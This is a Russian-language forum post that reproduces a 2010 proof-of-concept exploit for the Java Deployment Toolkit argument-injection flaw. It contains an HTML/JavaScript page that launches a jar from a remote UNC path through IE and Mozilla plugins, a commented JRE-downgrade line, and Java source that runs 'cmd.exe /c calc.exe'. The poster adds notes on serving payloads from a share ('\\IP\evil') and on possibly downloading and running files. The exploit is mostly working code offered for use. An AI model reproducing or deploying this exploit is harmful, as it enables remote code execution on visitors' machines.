Код:
<html>
<head><title>Java Deployment Toolkit Test Page</title></head>
<body>
<script>
// Tavis Ormandy <taviso@sdf.lonestar.org>, April 2010
var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";
if (window.navigator.appName == "Microsoft Internet Explorer") {
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
// Trigger the bug
o.launch(u);
} else {
// Mozilla
var o = document.createElement("OBJECT");
var n = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
n.type = "application/java-deployment-toolkit";
document.body.appendChild(o);
document.body.appendChild(n);
// Test both MIME types
try {
// Old type
o.launch(u);
} catch (e) {
// New type
n.launch(u);
}
}
// Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
// this classic exploit?
// http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1
// o.installJRE("1.4.2_18");
</script>
</body>
</html>
http://lock.cmpxchg8b.com/bb5eafbc6c6e67e1...2/testcase.html
запуск калькулятора
уязвимость позволяет запускать cmd, возможно исполнять скачку и запуск файла через яву, что не пробовал т.к. уязвимость не работает через хттп.
работает через расшаренные ресурсы
\\IP\evil
либо локально
d:\calc.jar
удаленно,как в примере, у меня запустить не удалось, либо руки кривые, либо всё же ограничения есть на запуск с хттп.
что скорей всего второе)
по сути работать должно на
browser: <=ie8, FF,Opera
OS: <=7
ЗЫ: забыл, сорс calc.jar
Код:
public class Main
{
public Main()
{
}
public static void main(String args[])
throws Exception
{
Runtime.getRuntime().exec("cmd.exe /c calc.exe");
}
}